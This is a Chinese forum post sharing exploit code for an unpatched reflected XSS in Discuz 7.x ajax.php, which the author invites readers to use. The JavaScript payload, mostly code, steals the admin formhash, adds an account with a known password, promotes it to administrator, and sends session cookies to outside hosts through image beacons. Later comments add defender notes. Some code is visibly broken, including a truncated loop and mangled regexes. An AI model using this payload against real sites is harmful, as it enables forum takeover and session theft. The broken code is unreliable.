【Exp】discuz 7.x xss 利用代码


    discuz 7.X 有个反射型XSS,一直都没有补,读者可以去Google一下,以下是该XSS的利用代码,用ajax添加用户并加为管理员,再发邮件通知。大家拿去玩吧。

此反射型XSS在ajax.php中,exploit如下:

// Payload constants: a label sent along with the exfiltrated data, and the
// account name the payload tries to create. Defender note: a member row with
// exactly this username appearing right after an admin session visited
// ajax.php is a concrete indicator of this payload having run.
var type = "Discuz 7 ";
var username_add = "blackcushion020";

// Return the part of `url` that precedes "ajax.php" (the site prefix).
// With no argument the current page URL is used. Returns the string "null"
// when the pattern is absent. The regex is kept exactly as the original
// (unescaped dot, optional trailing "p"), so "ajax-php" style strings match too.
var getHost = function(url) {
        var pageUrl = (typeof url == "undefined" || null == url)
                ? window.location.href
                : url;
        var parts = pageUrl.match(/(.*)ajax.php?(.*)/);
        if (typeof parts != "undefined" && null != parts) {
                return parts[1];
        }
        return "null";
}
// Fire-and-forget GET of `s` via an invisible Image (a classic beacon).
// Defender note: this is the exfiltration primitive used later in the page;
// it leaves a plain outbound image request in proxy/egress logs, and a
// Content-Security-Policy `img-src` restricted to the site's own origin
// would block it outright.
function getURL(s) {
var image = new Image();
image.style.width = 0;
image.style.height = 0;
image.src = s;
}

// ---- payload body: runs in the victim's browser, inside the reflected-XSS context ----
// Defender note: nothing below needs the admin password. Every request rides on the
// victim's own session, so the controls that matter server-side are (1) output-encoding
// the value ajax.php reflects, and (2) not letting formhash alone authorise admincp
// writes -- an in-origin script can simply read the token out of the page body
// (step 1 below). HttpOnly on the session cookie blocks the document.cookie reads but
// not the in-session requests.
var siteurl=getHost();
alert(siteurl);   // debugging popup left in by the author
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
// Legacy IE fallback: probe ProgIDs until one constructs; failures are swallowed.
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;
// Step 1: synchronously fetch the admin "add member" form and scrape its formhash.
// This is the line that defeats formhash as a CSRF defence when XSS is present.
xmlhttp.open("GET", siteurl+"admincp.php?action=members&operation=add", false);
xmlhttp.send(null);
var echo = xmlhttp.responseText;
var reg = / name="formhash" value="([wd]+)"/i;
var arr=reg.exec(echo);
if(!arr){
// No formhash in the response (victim is not an admin, or not logged in):
// fall back to exfiltrating document.cookie to a third-party host via the beacon.
// Detection: outbound GET to an external host carrying a "cookie=" query parameter.
alert(document.cookie);
getURL("http://12.yifi8.cn/mail/phpwriter.php?cookie="+encodeURIComponent(document.cookie)+"&siteurl="+encodeURIComponent(siteurl)+"&type="+encodeURIComponent(type));
}
// Suppress further script errors so the chain fails quietly instead of surfacing.
window.onerror=function(){return true;}
var formhash=arr[1];
alert(formhash);
// Step 2: create a new member with a known password through the admin form,
// reusing the scraped formhash. Hand-set Referer/Content-Length headers are
// ignored or overwritten by modern browsers; a Referer check alone would not
// have helped here anyway since the request is genuinely same-origin.
var post="formhash="+formhash+"&anchor=&newusername="+username_add+"&newpassword=123456ab&newemail=dd23d2d7d%40126.com&newgroupid=10&emailnotify=0&addsubmit=%CC%E1%BD%BB";
xmlhttp.open("POST",siteurl+"admincp.php?action=members&operation=add",false);
xmlhttp.setRequestHeader("Referer", siteurl);
xmlhttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xmlhttp.setRequestHeader("content-length",post.length);
xmlhttp.setRequestHeader("content-type","application/x-www-form-urlencoded");
xmlhttp.send(post);

alert("aaaaaaa");
// Step 3: scrape the new account's UID out of the success page, then change its
// group to groupidnew=1 (the administrator group) via the member-group form.
// Detection: an admincp member add followed within seconds by operation=group on
// the freshly created uid, from the same session, is a strong signal of this chain.
var echo2 = xmlhttp.responseText;
//var reg2 = /blackcushion013(UID([wd]+))/i;
//var reg2 = /用户(.*)添加成功/;
var reg2 = /blackcushion020(UID ([d]+))/i;
var arr2=reg2.exec(echo2);
var sid2=arr2[1];

var post2="formhash="+formhash+"&anchor=&groupidnew=1&adminidnew%5B0%5D=0&expirydatenew=&expgroupidnew=1&expadminidnew=1&editsubmit=%CC%E1%BD%BB";
xmlhttp.open("POST",siteurl+"admincp.php?action=members&operation=group&uid="+sid2,false);
xmlhttp.setRequestHeader("Referer", siteurl);
xmlhttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xmlhttp.setRequestHeader("content-length",post.length);
xmlhttp.setRequestHeader("content-type","application/x-www-form-urlencoded");
xmlhttp.send(post2);

// Step 4: notify the attacker's mailer with the cookie and site URL (same beacon
// shape as in step 1's fallback). For responders, these two external image
// requests are the most visible artefact of the whole chain in egress logs.
getURL("http://baidu.cn/mail/phpmail.php?cookie="+encodeURIComponent(document.cookie)+"&siteurl="+encodeURIComponent(siteurl)+"&type="+encodeURIComponent(type));

    最后那句是邮件通知,phpmail.php是一个用JMAIL组件发信的PHP脚本(陆羽大牛好像发过一个,我那个就不传上来了,其实是一样的)
